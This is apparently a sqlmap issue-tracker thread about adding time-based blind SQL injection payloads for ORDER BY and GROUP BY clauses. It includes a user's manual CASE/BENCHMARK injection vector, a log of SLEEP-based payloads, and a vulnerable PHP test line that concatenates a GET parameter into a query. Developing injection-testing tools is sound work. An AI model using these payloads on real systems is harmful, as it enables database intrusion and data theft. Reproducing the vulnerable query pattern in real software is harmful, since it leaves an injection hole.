Add ORDER BY/GROUP BY time-based payloads

[bdamele]

From a user:

I'm having trouble exploiting an SQLi in an ORDER BY clause with sqlmap. Manually I can inject using a construct like "(CASE WHEN 'a'='b' THEN t.bar ELSE (SELECT BENCHMARK(1000000,MD5(1))) END)" where t.bar is a correct column name and then altering the boolean clause. Unfortunately the target server responds pretty slowly, so a manual extraction is gonna be agonizingly slow.

Just passing the target URL to sqlmap (yesterday's build 4938), sqlmap wont find an injection using level 3. I also tried passing my manual vector as prefix/suffix (--prefix="(CASE WHEN 'a'='" --suffix="' THEN t.bar ELSE (SELECT BENCHMARK(1000000,MD5(1))) END)") but without avail.

[bdamele]

The following payload works against MySQL >= 5.0 against a ORDER BY SQL injection:

[09:47:29] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[09:47:29] [PAYLOAD] 1) AND SLEEP(1)
[09:47:29] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[09:47:29] [PAYLOAD] 1' AND SLEEP(1)
[09:47:29] [PAYLOAD] 1) AND SLEEP(1) AND (1336=1336
[09:47:29] [PAYLOAD] 1)) AND SLEEP(1) AND ((4576=4576
[09:47:29] [PAYLOAD] 1))) AND SLEEP(1) AND (((5848=5848
[09:47:29] [PAYLOAD] 1 AND SLEEP(1)
[09:47:34] [PAYLOAD] 1 AND SLEEP(1)
[09:47:39] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable 

The vulnerable test page runs this statement:

$query = "SELECT * FROM users GROUP BY " . $_GET['id'];

[bdamele]

However, the above is not meant to be a proper time-based blind payload for GROUP BY. It's MySQL being flexible in its syntax to allow it - I am looking into a proper fix

[bdamele]

Done